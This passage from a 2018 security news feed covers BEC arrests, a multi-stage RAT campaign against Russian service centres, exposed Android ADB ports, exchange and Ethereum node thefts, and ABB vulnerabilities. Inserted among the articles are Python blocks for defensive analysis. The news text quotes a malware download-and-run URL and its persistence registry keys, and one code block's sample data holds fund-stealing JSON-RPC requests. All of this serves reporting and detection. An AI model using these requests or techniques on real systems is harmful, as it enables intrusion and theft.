The unit, dubbed Force 47, is also tasked with fighting anti-state propaganda on the web.


Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams
12.6.2018 securityaffairs BigBrothers

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.
On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The authorities conducted the investigation for over six months; 42 suspects were arrested in the United States, 29 in Nigeria, and the remaining three in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to disrupt and recover roughly $14 million in fraudulent wire transfers.

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.”


During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters.

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. In one case, the suspects tricked a real estate closing attorney into wiring $246,000 to an account they controlled.

According to a report published by Trend Micro, losses caused by Business Email Compromise (BEC) attacks have grown in recent years and are estimated to reach $9 billion in 2018. This rising figure takes into account new attack vectors such as the Dark Caracal campaign, attributed to a Lebanese intelligence agency, which uses malicious Android applications.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $5.3 billion industry in the past years. In that regard, the report emphasizes that hackers employ social engineering to lure and deceive employees in a myriad of scams that bypass security measures. By exploiting a deep understanding of human psychology, attackers circumvent defenses; as the report states, “it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: bogus invoice scheme, CEO fraud, account compromise, attorney impersonation and data theft. The report highlights that these attacks can be classified into two major groups: credential grabbing and email only.

In the analysis of losses by crime type in the FBI 2017 Internet Crime Report, a document that outlines cybercrime trends over the past year, BEC/EAC ($676,151,185) tops the list, followed by Confidence Fraud/Romance ($211,382,989) and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”


Crooks used multi-stage attacks aimed at Russian Service Centers
12.6.2018 securityaffairs BigBrothers

Fortinet recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.
Security researchers from Fortinet have recently spotted a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

Experts highlighted that the hackers conducted multi-stage attacks, but excluded the involvement of a nation-state actor.

Attackers leveraged spear-phishing messages carrying weaponized Office documents that exploit the 17-year-old MS Office flaw CVE-2017-11882, which was addressed by Microsoft updates in October.

The first attacks were observed at the end of March when crooks sent spear-phishing emails to a service company that repairs Samsung’s electronic devices.

The messages were written in Russian and contained a file named “Symptom_and_repair_code_list.xlsx”.


“FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.” reads the post published by Fortinet.

“A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.”

Experts noticed that the content of the email was the result of a translation made by a translator service; analyzing the headers of the email, the experts discovered that the IP address of the sender wasn’t associated with the domain in the “From” field.

The attackers used a different XLSX file for each email. The shellcode embedded in the documents performs various tasks to gain access to the LoadLibraryA and GetProcAddress functions, which allow it to execute the final payload.

“The two most important functions “imported” by the shellcode are: URLDownloadToFileW and ExpandEnvironmentStringsW.” continues the analysis.

“The purpose of the first one is obvious. The last function is used to determine the exact location where the shellcode should store downloaded payload, since this location will be different under different platforms. Finally, Shellcode downloads a file from the URL: hxxp://brrange.com/imm.exe, stores it in %APPDATA%server.exe, and then tries to execute it.”

The final payload uses multiple-layer multi-packer protection to avoid detection.

The first stage implements the first layer of protection, the popular ConfuserEx packer, which obfuscates object names as well as the names of methods and resources.

The resources are used to determine the next stage payload, which is encrypted using DES, and executes the decrypted file named BootstrapCS that represents the second stage of the multi-layer protection.

BootstrapCS is not obfuscated, but it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

These checks are meant to keep the code from running in a virtualized environment; the stage also searches for and shuts down specified processes. It also writes the payload path to the following startup registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]

Stage 3 of the payload is stored in a binary resource named mainfile and represents the third level of packing protection: a simple XOR algorithm with KEY = 0x20 was used for encryption.

Once decrypted, the payload is injected into a process chosen based on the value in the settings resource file.

Stage 3 of the payload resolves to a commercial Remote Administration Tool (RAT) dubbed Imminent Monitor. At stage 4, the security researchers once again encountered the ConfuserEx packer.

The Imminent Monitor RAT includes the following five modules, which allow the malicious code to control the victim’s machine, including the webcam:

Aforge.Video.DirectShow 2.2.5.0
Aforge.Video 2.2.5.0
Injector 1.0.0.0
ClientPlugin 1.0.0.0
LZLoader 1.0.0.0

The analysis of the C&C servers revealed 50 domains registered by the attackers on the same day; some of them were used by the crooks to deliver malware, while others were involved in phishing attacks. The experts also discovered older .XLSX samples that exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” concludes Fortinet.

Further details are included in the IoCs section of the report.


Multi-Stage Attacks Target Service Centers in Russia
11.6.2018 securityweek BigBrothers

Fortinet security researchers recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

The attacks stand out because of their multi-staging and are believed to have been launched by a non-Russian actor. The attackers used spear-phishing emails and malicious Office documents exploiting CVE-2017-11882, a 17-year-old vulnerability in Office’s Equation Editor that Microsoft manually patched in October last year.

The targeted attack started at the end of March with spear-phishing emails received at a service company that repairs Samsung’s electronic devices. Pretending to come from representatives of Samsung, the emails specifically targeted this organization, were written in Russian, and contained a file named Symptom_and_repair_code_list.xlsx, related to the targeted company’s profile.

The emails were likely the result of machine translation, instead of being created by a native Russian speaker, the security researchers reveal. Furthermore, the headers of the email revealed that the IP address of the sender wasn’t related to the domain in the “From” field.

The attackers used different attachments for each email, but all messages had seemingly legitimate .XLSX files attached. Furthermore, all of the documents contained an exploit for the CVE-2017-11882 vulnerability.

The shellcode used in the attacks was meant to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload. It also imports other functions, including one used to determine the exact location where the downloaded payload should be stored.

The payload features multiple-layer multi-packer protection, starting with an initial layer where the well-known ConfuserEx packer was used to obfuscate objects names, along with the names of methods and resources. From these resources, it reads the next stage payload, which is encrypted using DES, and executes the decrypted file.

The decrypted file, named BootstrapCS, is the second stage of the multi-layer protection. While not obfuscated, it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This stage can check for various emulation, sandbox, and virtual machine tools, and also searches for and shuts down specified processes, in addition to disabling system utilities. It also writes the payload path to startup registry keys, hides the file with system and hidden attributes, and injects the payload in various processes.

A binary resource named mainfile is the encrypted stage 3 of the payload. It is an executable that represents the third level of packing protection: a simple XOR algorithm with the KEY = 0x20 was used for encryption. The decrypted payload is injected into a process based on the value in the settings resource file.
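The third packing layer described here (and in the securityaffairs write-up of the same Fortinet research earlier on this page) is a single-byte XOR with key 0x20. The Python below is an added example, not Fortinet's code or any tool from the report: it shows how an analyst peels that layer off an extracted resource and confirms the result is a PE image, and it goes slightly beyond the text by recovering an unknown single-byte key from the expected "MZ" header when the reported key does not fit. The resource bytes are constructed for the demonstration, and `build_fake_pe`, `unpack_stage3` and the other names are this example's own.

```python
import struct
from typing import Optional

XOR_KEY = 0x20  # key reported for the stage-3 "mainfile" resource


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR: the same operation packs and unpacks a buffer."""
    return bytes(b ^ key for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check on an unpacked buffer: DOS 'MZ' signature and an
    e_lfanew field (offset 0x3C) that points at the 'PE\\0\\0' NT signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_single_byte_key(packed: bytes) -> Optional[int]:
    """Known-plaintext key recovery: if the resource is expected to hold a PE,
    the first plaintext byte is 'M', so key = packed[0] ^ ord('M'). Returns
    None when that guess does not decode to a plausible PE."""
    if not packed:
        return None
    key = packed[0] ^ ord("M")
    return key if looks_like_pe(xor_decode(packed, key)) else None


def unpack_stage3(resource: bytes) -> Optional[bytes]:
    """Peel the XOR layer: try the reported key first, then fall back to
    recovering the key from the expected header."""
    plain = xor_decode(resource, XOR_KEY)
    if looks_like_pe(plain):
        return plain
    key = recover_single_byte_key(resource)
    return xor_decode(resource, key) if key is not None else None


def build_fake_pe() -> bytes:
    """Constructed stand-in for the unpacked stage (hypothetical bytes, not a
    real executable): a 0x40-byte DOS header whose e_lfanew points at 'PE\\0\\0'."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    sample = build_fake_pe()
    packed = xor_decode(sample, XOR_KEY)  # what the "mainfile" resource would look like
    # XOR 0x20 flips the case of ASCII letters, so the packed header begins with "mz"
    # and readable strings in the payload appear case-inverted in the resource.
    print(packed[:2], unpack_stage3(packed)[:2])
```

The case-flip property of XOR 0x20 is worth remembering when triaging .NET resources: a blob whose strings look like "mZ" or "tHIS PROGRAM CANNOT BE RUN" is a strong hint that this layer is in play before any decoding is attempted.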

Stage 3 of the payload references a commercial Remote Administration Tool (RAT) called Imminent Monitor, which can be purchased by anyone directly from the app developer (who apparently prohibits malicious use of the program). At stage 4, the security researchers once again stumbled upon ConfuserEx.

The main payload of the attack, however, turned out to be the commercial version of the Imminent Monitor RAT, which includes five modules to record videos using the victim’s webcam, to spy on victims, and to control their machines.

The command and control (C&C) servers used in these attacks led the researchers to discover 50 domains registered on the same day, some of which were used to spread malware, while others for phishing attacks. The researchers also discovered older .XLSX samples that use the same C&C but attempt to exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” Fortinet concludes.


Industrial Cybersecurity Firm Claroty Raises $60 Million
11.6.2018 securityweek IT

New York-based industrial cybersecurity firm Claroty announced on Monday that it raised $60 million in a Series B funding round, bringing the total amount raised by the company to date to $93 million.

The funding round was led by Temasek, with participation from several industrial giants, including Rockwell Automation, Schneider Electric’s investment arm Aster Capital, and Siemens-backed venture capital firm Next47. Envision Ventures, Tekfen Ventures and original Claroty investors Bessemer Venture Partners, Innovation Endeavors, Team8, and ICV also contributed.

The company will use the new funds to further advance the technology powering its products, grow the Claroty brand, and extend global sales and customer support.

Claroty has been working with Rockwell Automation for nearly two years and in 2017 the companies announced that they had teamed up to combine their security products and services. Claroty also struck a deal last year with Schneider Electric to market its network monitoring solutions through Schneider’s Collaborative Automation Partner Program (CAPP).

Siemens has also entered a partnership with Claroty. A recently introduced anomaly detection capability added by Siemens to its service offering involves Claroty software running on Siemens hardware – initially on ruggedized PCs and, in the future, on switches.

Claroty was founded in 2014 and it emerged from stealth mode in 2016 with $32 million in funding. The company claims it has recorded a 300% year-over-year growth in bookings and customer base, which includes organizations all around the world in the electric utilities, oil and gas, chemical, manufacturing, mining, food and beverage, and real estate sectors.

Claroty’s ICS security platform continuously monitors operational technology (OT) networks in search of potential threats. The product enables organizations to control remote employee and third-party access to critical systems, and helps them create a detailed inventory of industrial network assets and identify configuration issues.

“Protecting the critical automation systems our customers operate against cyberattacks remains a top priority for the company,” said Frank Kulaszewicz, SVP, Architecture & Software at Rockwell Automation. “Claroty has been a partner since 2016 and their advanced technology is a key element of our real-time threat detection and monitoring service. Our investment in Claroty is a logical extension of our ongoing strategic partnership.”

“A perimeter defense to cybersecurity in today’s connected world is not enough. An end-to-end approach, with solutions that provide deep visibility into operational technology and industrial control systems, is critical for the security of heavy processing environments,” said Hervé Coureil, Chief Digital Officer at Schneider Electric. “Leading the digital transformation of energy management and automation, Schneider Electric takes cybersecurity very seriously and the partnership with Claroty complements the cybersecurity layer of our IoT-enabled EcoStruxure architecture.”


Many Android Devices Ship with ADB Enabled
11.6.2018 securityweek Android

Many vendors ship Android devices with the Android Debug Bridge (ADB) feature enabled, thus rendering them exposed to various attacks, security researcher Kevin Beaumont has discovered.

ADB is a feature meant to provide developers with the ability to easily communicate with devices remotely, to execute commands and fully control the device. Because it doesn’t require authentication, ADB allows anyone to connect to a device, install apps and execute commands.

In theory, the device should be first connected via USB to enable ADB, but Beaumont has discovered that some vendors ship Android devices with the feature enabled right from the start. The Debug Bridge listens on port 5555, and anyone can connect to the device over the Internet.

“During research for this article, we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition,” the security researcher notes.

This is clearly a major issue, as anyone can remotely access devices with ADB enabled and, without any password but with root privileges, can silently install software and execute malicious functions.

The issue is not related to ADB itself, as it wasn’t designed to be deployed in this manner, but with devices having the feature enabled. Furthermore, root access should not be available in non-development builds, but this can be bypassed on some devices, not to mention that some users enabled root on their own.

To make matters worse, the security researcher also discovered a worm taking advantage of this security slip and attempting to infect devices via ADB.

Starting February 1, there was a massive increase in scans for TCP port 5555 (the Android Debug Bridge port), with “nearly ten thousand unique IP addresses scanning in any 24 hour window.” There are over a hundred thousand IP addresses scanning each 30 days, but the security researcher couldn’t determine the exact number of infected devices.

“These devices are currently being used for cryptocurrency mining, where computing resources is misused without the owner’s permission to generate profits for criminals,” Beaumont notes.

Qihoo 360’s Netlab issued a warning on the matter on February 4, but the problem continued to grow, mostly in Asia.

Analysis of the worm revealed it is spreading using a modified version of Mirai’s code, leveraging the official Android ADB tools. It lacks a command and control (C&C) server and moves peer-to-peer via port 5555. Because of various bugs in its code, the malware only works on certain types of devices.
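As an added example (not from Beaumont's research or any tool mentioned in the article), the Python below shows the kind of detection a defender can run over perimeter logs to see the scanning described above: it counts distinct external sources probing TCP 5555 inside any 24-hour window, the metric quoted in the article, and separately flags internal hosts that themselves initiate connections to 5555, which matches the peer-to-peer spreading behaviour attributed to the worm. The log line format, the 192.0.2.0/24 "internal" network and the sample lines are constructed for the example and use documentation IP ranges.

```python
import ipaddress
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set

ADB_PORT = 5555  # TCP port ADB listens on when enabled over the network

# Assumption for the example: the monitored network is 192.0.2.0/24 (a documentation range).
INTERNAL_NET = ipaddress.ip_network("192.0.2.0/24")

# Constructed sample firewall log (hypothetical format); all addresses are documentation ranges.
SAMPLE_LOG = """\
2018-02-01T00:13:22Z DENY src=203.0.113.7 dst=192.0.2.10 proto=tcp dport=5555
2018-02-01T03:40:01Z DENY src=198.51.100.23 dst=192.0.2.10 proto=tcp dport=5555
2018-02-01T05:02:45Z DENY src=203.0.113.7 dst=192.0.2.11 proto=tcp dport=5555
2018-02-01T09:15:09Z ALLOW src=198.51.100.90 dst=192.0.2.12 proto=tcp dport=443
2018-02-01T22:58:30Z DENY src=203.0.113.55 dst=192.0.2.10 proto=tcp dport=5555
2018-02-02T01:00:00Z DENY src=198.51.100.200 dst=192.0.2.10 proto=tcp dport=5555
2018-02-02T02:30:00Z ALLOW src=192.0.2.10 dst=198.51.100.77 proto=tcp dport=5555
garbage line that the parser must skip
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) (?P<action>ALLOW|DENY) "
    r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) proto=(?P<proto>\w+) dport=(?P<dport>\d+)$"
)


def parse_line(line: str) -> Optional[Dict]:
    """Turn one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    ev["dport"] = int(ev["dport"])
    return ev


def parse_log(text: str) -> List[Dict]:
    return [ev for ev in (parse_line(raw) for raw in text.splitlines()) if ev is not None]


def inbound_adb_probes(events: List[Dict], internal=INTERNAL_NET) -> List[Dict]:
    """Connection attempts to TCP 5555 coming from outside the monitored network."""
    return [ev for ev in events
            if ev["dport"] == ADB_PORT and ipaddress.ip_address(ev["src"]) not in internal]


def max_unique_scanners(events: List[Dict], window: timedelta = timedelta(hours=24)) -> int:
    """Largest number of distinct external sources probing 5555 inside any
    sliding window of the given length, computed by starting a window at each probe."""
    probes = sorted(inbound_adb_probes(events), key=lambda ev: ev["ts"])
    best = 0
    for i, first in enumerate(probes):
        end = first["ts"] + window
        best = max(best, len({ev["src"] for ev in probes[i:] if ev["ts"] < end}))
    return best


def internal_hosts_reaching_adb(events: List[Dict], internal=INTERNAL_NET) -> Set[str]:
    """Internal hosts that initiate connections to 5555 elsewhere. Since the worm
    spreads peer-to-peer over 5555, such a host may itself be an exposed or
    already-infected device and deserves a closer look."""
    return {ev["src"] for ev in events
            if ev["dport"] == ADB_PORT and ipaddress.ip_address(ev["src"]) in internal}


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print("unique external scanners in busiest 24h window:", max_unique_scanners(events))
    print("internal hosts connecting out to 5555:", sorted(internal_hosts_reaching_adb(events)))
```

On real logs the inbound count mostly measures Internet background noise; the outbound set is the actionable one, because a device on the inside reaching for port 5555 on other hosts is behaving like the worm rather than like a victim of it.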

The issue, however, is larger than a simple botnet abusing devices for cryptocurrency mining. The fact that the impacted devices ship misconfigured is the actual problem, especially with some of them used in corporate environments.

“If somebody wanted to, they could run something other than cryptocurrency mining — which could develop into a serious issue,” Beaumont points out.

Searching for devices listening on port 5555 and filtering the results using Metasploit’s adb_server_exec module, the researcher discovered over 80,000 devices in China alone.

“It’s very clear through digging through data and feeds that a huge number of misconfigured devices exist, hence all the scanning for port 5555,” the researcher notes.

According to Beaumont, vendors should make sure they do not ship products with ADB enabled over a network, especially on devices designed to stay connected to the Internet, as these devices remain exposed and can be misused, while also placing users in harm’s way. Vendors are also advised to release updates to correct the issue.


Bitcoin Declines After Coinrail Cryptocurrency Exchange Hack
11.6.2018 securityweek Cryptocurrency

Another Bitcoin exchange has been hacked, strengthening concerns over the security of exchanges, and causing a further fall in the value of bitcoins.

Coinrail, a relatively small cryptocurrency exchange in South Korea (but still within the world's top 100 exchanges), confirmed an 'intrusion' over the weekend. On Sunday it tweeted, "There has been a cyber intrusion in our system. We're confirming it and some coins (Pundi X, NPXS) are confirmed."

Commenting on Twitter, @peatrykim claims, "The total hacked coins worth 50mil dollars." A South Korean news outlet, Yonhap, suggests that about 40 billion won ($37.28 million) worth of virtual coins were stolen.

Coinrail said that about 30% of its coins were stolen, but also claims to have blocked most of them before they could be cashed out by the hackers. The remaining 70% are now stored in a 'cold wallet' (that is, off-line) and are thought to be safe.

There is no information yet on how the hack was executed, nor who might have been involved. Coinrail is working with law enforcement.

A statement on its website (Google translation) says, "At present , 70% of your coin rail total coin / token reserves have been confirmed to be safely stored and moved to a cold wallet and are in storage. Two-thirds of the coins confirmed to have been leaked are covered by freezing / recalling through consultation with each coach and related exchanges. The remaining one-third of coins are being investigated with investigators, relevant exchanges and coin developers."

Bitcoin, Ethereum and Ripple, the world's largest cryptocurrencies, all declined approximately 5% or 6% over the weekend. Bitcoin has now declined almost 50% for the year, and approximately 65% from its all-time high in December 2017.

In January 2018, 14 South Korean exchanges adopted measures aimed at better protecting users. "Coinrail is not a member of the group that promotes self-regulation to enhance security," commented Kim Jin-Hwa of the Korea Blockchain Industry Association. "It is a minor player in the market and I can see how such small exchanges with lower standards on security level can be exposed to more risks."

F-Secure security expert Mikko Hypponen echoed this sentiment on Twitter. "We see this regularly. Attackers are moving on from traditional financial targets; from hacking online banks and online stores to hacking crypto exchanges and token wallets. This makes a lot of sense from the attacker's point of view," he tweeted. "Cryptocurrency exchanges are ideal targets for attackers. Small companies with a lot of money. Run by startups, with small security teams and no experience. And if you get in, the loot is already anonymized and untrackable."

Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge, also commented on the incident.

"It's one more drop in the ocean of crypto-breaches and it's unlikely to drive any substantially new conclusions or concerns. This Bitcoin drop seems to be a temporary fluctuation, investors are now waiting for some good or bad news," Kolochenko said. "The emerging problem of Bitcoin is its extreme influenceability by third-parties. A well-prepared hacking campaign, targeting top Western media agencies, can virtually ruin Bitcoin after releasing fake news about major breaches and subsequent cryptocurrency ban by major countries. People playing short can make unprecedented profits, however, Bitcoin may ultimately never recover at the end of the day."


Critical Flaws Expose ABB Door Communication Systems to Attacks
11.6.2018 securityweek ICS

Researchers discovered several critical vulnerabilities in door communication systems made by Switzerland-based industrial tech company ABB. Both patches and workarounds have been made available by the vendor.

The vulnerable product is the ABB IP Gateway (also sold under the Busch-Jaeger brand), a component of ABB’s door communication solutions, which include audio and video intercoms, fingerprint readers, and access code keypads. The IP Gateway provides the connection between the intercom, the local network and the mobile application that can be used to remotely monitor and control the system. The company’s solutions are used by organizations around the world.

According to a security advisory published recently by ABB, researchers Maxim Rupp and Florian Grunow of ERNW discovered several potentially serious vulnerabilities in the IP Gateway running firmware versions 3.39 and prior.

Grunow discovered a remote code injection flaw that allows an attacker with access to the local network to take control of the targeted device. The vulnerability affects the local configuration web server and it can be exploited by sending specially crafted messages to the system.

Rupp identified a total of three vulnerabilities. One of them, CVE-2017-7931, allows an attacker to bypass authentication and access configuration files and application pages on the web server simply by navigating to their associated URL.


According to an advisory published by ICS-CERT, which Rupp has described to SecurityWeek as accurate, the configuration files that can be accessed by exploiting this flaw can contain passwords stored in clear text, an issue tracked as CVE-2017-7933. ABB’s advisory claims plaintext passwords can be obtained by an attacker from the user’s browser cookies following a successful login.

Finally, ABB IP Gateway is affected by a cross-site request forgery (CSRF) bug, tracked as CVE-2017-7906, that allows an attacker to conduct various actions on behalf of a legitimate user. These types of attacks can be carried out remotely, but they typically require some user interaction (e.g. clicking on a link, visiting a malicious webpage).

ICS-CERT, whose advisory does not mention the issue identified by Grunow, has classified all the vulnerabilities as being critical or high severity.

ABB says it has patched the vulnerabilities with the release of firmware version 3.40. The company has also provided workarounds and noted that attacks can be mitigated by using security best practices for protecting a network against external attacks. The most important recommendation is that users ensure the web server cannot be accessed directly from the Internet.

The vendor is not aware of any attempts to exploit these vulnerabilities in the wild and noted that details of the security holes have not been made public.


Experts warn hackers have already stolen over $20 Million from Ethereum clients exposing interface on port 8545

11.6.2018 securityaffairs  CyberCrime

A cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000, from Ethereum clients exposing an unsecured JSON-RPC interface on port 8545.
Cybercriminals who have raked in over 20 million dollars in the past few months by hijacking poorly configured Ethereum nodes exposed online are continuing their operations.

In March, security experts from Qihoo 360 Netlab reported a hacking campaign aimed at Ethereum nodes exposed online: crooks were scanning for port 8545 to find wallets that exposed their JSON-RPC interface.

At the time, the researchers reported that the cybercrime gang had stolen 3.96234 Ether (between $2,000 and $3,000); now they have tracked another criminal gang that has already accumulated a far larger amount of funds in its wallets.

Researchers claim the cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000.

360 Netlab
@360Netlab
Remember this old twitter we posted? Guess how much these guys have in their wallets? Check out this wallet address https://www.etherchain.org/account/0x957cd4ff9b3894fc78b5134a8dc72b032ffbc464#transactions $20,526,348.76, yes, you read it right, more than 20 Million US dollars https://twitter.com/360Netlab/status/974374944711815168

8:48 AM - Jun 11, 2018
“If you have honeypot running on port 8545, you should be able to see the requests in the payload, which has the wallet addresses,” states Qihoo 360 Netlab team. “And there are quite a few IPs scanning heavily on this port now.”

Geth is a popular client for running an Ethereum node; it allows users to manage the node remotely through its JSON-RPC interface.

Developers can use this programmatic API to build applications that retrieve private keys, transfer funds, or retrieve personal details of the wallet owner.

The hackers moved stolen funds to the Ethereum account having the address 0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464.
The good news is that the JSON-RPC interface comes disabled by default in most apps.

In May 2018, crooks used the Mirai-based Satori botnet to scan the Internet for Ethereum mining software that had been accidentally left exposed online.

Unfortunately, several groups are actively scanning the Internet for insecure JSON-RPC interfaces in order to steal funds from unsecured cryptocurrency wallets.

Development teams have to secure their applications by only allowing connections to the geth client that originate from the local computer; another option is to implement an authentication mechanism for remote RPC connections.

Experts believe the hackers will increase their scanning for port 8545, also thanks to the online availability of tools that automate the process.
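As an added example (not code from the article or from Qihoo 360 Netlab), the Python below classifies JSON-RPC request bodies as a passive honeypot listening on port 8545 might record them, flagging the fund-moving methods and pulling out the wallet addresses the Netlab team refers to. The sample capture, the method lists and the addresses are constructed for illustration.

```python
"""Classify JSON-RPC requests recorded by a passive honeypot listening on TCP/8545."""
import json
import re

ADDRESS_RE = re.compile(r"0x[0-9a-fA-F]{40}")

# Methods that move funds or unlock keys when a node's RPC is reachable without authentication.
FUND_MOVING = {"eth_sendTransaction", "personal_sendTransaction",
               "personal_unlockAccount", "personal_importRawKey"}
# Methods typically used to enumerate accounts and balances before a transfer.
RECON = {"eth_accounts", "eth_getBalance", "personal_listAccounts", "web3_clientVersion"}

# Constructed sample addresses; they are not the real addresses named in the article.
VICTIM = "0x" + "11" * 20
PAYOUT = "0x" + "22" * 20


def _rpc(rid, method, params):
    return {"jsonrpc": "2.0", "id": rid, "method": method, "params": params}


# Constructed honeypot capture: one request body per line, as a scanner would send them.
SAMPLE_CAPTURE = [
    json.dumps(_rpc(1, "eth_accounts", [])),
    json.dumps(_rpc(2, "eth_getBalance", [VICTIM, "latest"])),
    json.dumps(_rpc(3, "personal_unlockAccount", [VICTIM, "", 0])),
    json.dumps(_rpc(4, "eth_sendTransaction",
                    [{"from": VICTIM, "to": PAYOUT, "value": "0x38d7ea4c68000"}])),
    json.dumps([_rpc(5, "web3_clientVersion", []), _rpc(6, "net_version", [])]),  # batch
    "GET / HTTP/1.1",  # not JSON-RPC at all; must be ignored rather than crash the parser
]


def parse_request(line):
    """Return the JSON-RPC request objects on one captured line (a batch yields several), or []."""
    try:
        body = json.loads(line)
    except ValueError:
        return []
    items = body if isinstance(body, list) else [body]
    return [i for i in items if isinstance(i, dict) and isinstance(i.get("method"), str)]


def classify(method):
    if method in FUND_MOVING:
        return "fund-moving"
    if method in RECON:
        return "recon"
    return "other"


def extract_addresses(request):
    """Every 20-byte hex address in the params, lower-cased, in first-occurrence order."""
    found = ADDRESS_RE.findall(json.dumps(request.get("params", [])))
    out = []
    for addr in (a.lower() for a in found):
        if addr not in out:
            out.append(addr)
    return out


def analyze(lines):
    findings = []
    for n, line in enumerate(lines, 1):
        for req in parse_request(line):
            findings.append({"line": n, "method": req["method"],
                             "risk": classify(req["method"]),
                             "addresses": extract_addresses(req)})
    return findings


def payout_targets(lines):
    """The 'to' addresses of transfer attempts: the wallets worth watching on a block explorer."""
    targets = set()
    for req in (r for line in lines for r in parse_request(line)):
        if req["method"] in ("eth_sendTransaction", "personal_sendTransaction"):
            params = req.get("params") or []
            if params and isinstance(params[0], dict) and isinstance(params[0].get("to"), str):
                targets.add(params[0]["to"].lower())
    return targets


if __name__ == "__main__":
    for f in analyze(SAMPLE_CAPTURE):
        print(f"line {f['line']:>2}  {f['risk']:<11} {f['method']:<24} {f['addresses']}")
    print("payout targets:", sorted(payout_targets(SAMPLE_CAPTURE)))
```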


Former GCHQ chief Hannigan warns of Russia’s aggressive approach to the cyberspace

11.6.2018 securityaffairs  BigBrothers

According to former GCHQ chief, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.
Former GCHQ chief Robert Hannigan has warned that the availability of hacking tools in the main marketplaces is rapidly changing the threat landscape. Hannigan served as the director of the UK intelligence agency from November 2014 until January 2017.

Threat actors have easy access to attack tools even without specific knowledge.

Hannigan gave a keynote speech titled “Weaponising the web: Nation-state hacking and what it means for enterprise cybersecurity” at the Infosec conference in London last week.

Hannigan highlighted the risks associated with operations conducted by nation-state actors, which have dramatically increased over the last five years.

State-sponsored hackers pose a serious risk to enterprises as well as governments; the former GCHQ chief warned that government APT groups use crime gangs as proxies to make attribution harder.

“Nation state attacks using criminal group as a proxy” is a “fairly new issue.” Hacking tools are becoming a commodity for threat actors and represent a problem for companies.

Hannigan mentioned the activity conducted by North Korea-linked APT groups and Iranian state-sponsored hackers.

North Korean APT groups, like the infamous Lazarus crew, have focused their activity on the SWIFT network as well as crypto exchanges to steal funds.

